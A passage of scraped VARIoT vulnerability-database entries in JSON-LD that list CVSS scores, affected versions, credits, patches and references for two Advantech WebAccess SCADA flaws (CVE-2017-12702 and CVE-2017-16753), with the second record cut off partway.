Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1117", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "db": "NVD", "id": "CVE-2017-12702" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007572" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12702", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-12702", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-23882", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "446b7b63-01fd-49d1-9bc1-399f42387092", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-103251", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2017-12702", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12702", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-12702", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2017-23882", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1281", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-103251", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "VULHUB", "id": "VHN-103251" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "db": "NVD", "id": "CVE-2017-12702" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Externally Controlled Format String issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. String format specifiers based on user provided input are not properly validated, which could allow an attacker to execute arbitrary code. Advantech WebAccess Contains a format string vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. \nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and gain elevated privileges. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-12702" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "VULHUB", "id": "VHN-103251" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12702", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "BID", "id": "100526", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201708-1281", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23882", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007572", "trust": 0.8 }, { "db": "IVD", "id": "446B7B63-01FD-49D1-9BC1-399F42387092", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103251", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "VULHUB", "id": "VHN-103251" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "db": "NVD", "id": "CVE-2017-12702" } ] }, "id": "VAR-201708-1117", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "VULHUB", "id": "VHN-103251" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNVD", "id": "CNVD-2017-23882" } ] }, "last_update_date": "2024-11-23T21:53:49.769000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Arbitrary Code Execution Vulnerability (CNVD-2017-23882)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101166" }, { "title": "Advantech WebAccess Fixes for formatting string vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74370" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-134", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "NVD", "id": "CVE-2017-12702" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12702" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12702" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "VULHUB", "id": "VHN-103251" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "db": "NVD", "id": "CVE-2017-12702" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNVD", "id": "CNVD-2017-23882" }, { "db": "VULHUB", "id": "VHN-103251" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "db": "NVD", "id": "CVE-2017-12702" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23882" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103251" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "date": "2017-08-30T18:29:00.360000", "db": "NVD", "id": "CVE-2017-12702" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-09-04T00:00:00", "db": "CNVD", "id": "CNVD-2017-23882" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103251" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007572" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1281" }, { "date": "2024-11-21T03:10:03.493000", "db": "NVD", "id": "CVE-2017-12702" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1281" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Vulnerabilities related to format strings", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007572" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Format string error", "sources": [ { "db": "IVD", "id": "446b7b63-01fd-49d1-9bc1-399f42387092" }, { "db": "CNNVD", "id": "CNNVD-201708-1281" } ], "trust": 0.8 } }
var-201801-0589
Vulnerability from variot
An Improper Input Validation issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows some inputs that may cause the program to crash. Advantech WebAccess Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The vulnerability is caused by a failure to properly validate WebAccess input. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Multiple denial-of-service vulnerabilities An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201801-0589", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 2.4, "vendor": "advantech", "version": "8.3" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" }, { "db": "NVD", "id": "CVE-2017-16753" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-011766" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Steven Seeley of Offensive Security, Zhou Yu and Andrea Micalizzi working with Trend Micro??s Zero Day Initiative, and Michael Deplante.", "sources": [ { "db": "BID", "id": "102424" } ], "trust": 0.3 }, "cve": "CVE-2017-16753", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2017-16753", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-00672", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2e0e090-39ab-11e9-b212-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-107707", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "id": "CVE-2017-16753", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-16753", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2017-16753", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2018-00672", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201801-240", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-107707", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "VULHUB", "id": "VHN-107707" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" }, { "db": "NVD", "id": "CVE-2017-16753" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "An Improper Input Validation issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows some inputs that may cause the program to crash. Advantech WebAccess Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The vulnerability is caused by a failure to properly validate WebAccess input. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple denial-of-service vulnerabilities\n2. Multiple stack-based buffer-overflow vulnerabilities\n3. A directory-traversal vulnerability\n4. An SQL-injection vulnerability\n5. Multiple denial-of-service vulnerabilities\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database,perform certain unauthorized actions, gain unauthorized access and obtain sensitive information", "sources": [ { "db": "NVD", "id": "CVE-2017-16753" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "BID", "id": "102424" }, { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-107707" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-16753", "trust": 3.6 }, { "db": "BID", "id": "102424", "trust": 3.4 }, { "db": "ICS CERT", "id": "ICSA-18-004-02", "trust": 2.6 }, { "db": "CNNVD", "id": "CNNVD-201801-240", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-00672", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-18-004-02A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-011766", "trust": 0.8 }, { "db": "IVD", "id": "E2E0E090-39AB-11E9-B212-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-107707", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "VULHUB", "id": "VHN-107707" }, { "db": "BID", "id": "102424" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" }, { "db": "NVD", "id": "CVE-2017-16753" } ] }, "id": "VAR-201801-0589", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "VULHUB", "id": "VHN-107707" } ], "trust": 1.4972832733333332 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2e0e090-39ab-11e9-b212-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-00672" } ] }, "last_update_date": "2024-11-23T22:22:16.130000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech WebAccess enters a patch for validation vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/113127" }, { "title": "Advantech WebAccess Enter the fix for the verification vulnerability", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=77551" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-00672" }, { "db": "JVNDB", "id": "JVNDB-2017-011766" }, { "db": "CNNVD", "id": "CNNVD-201801-240" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": 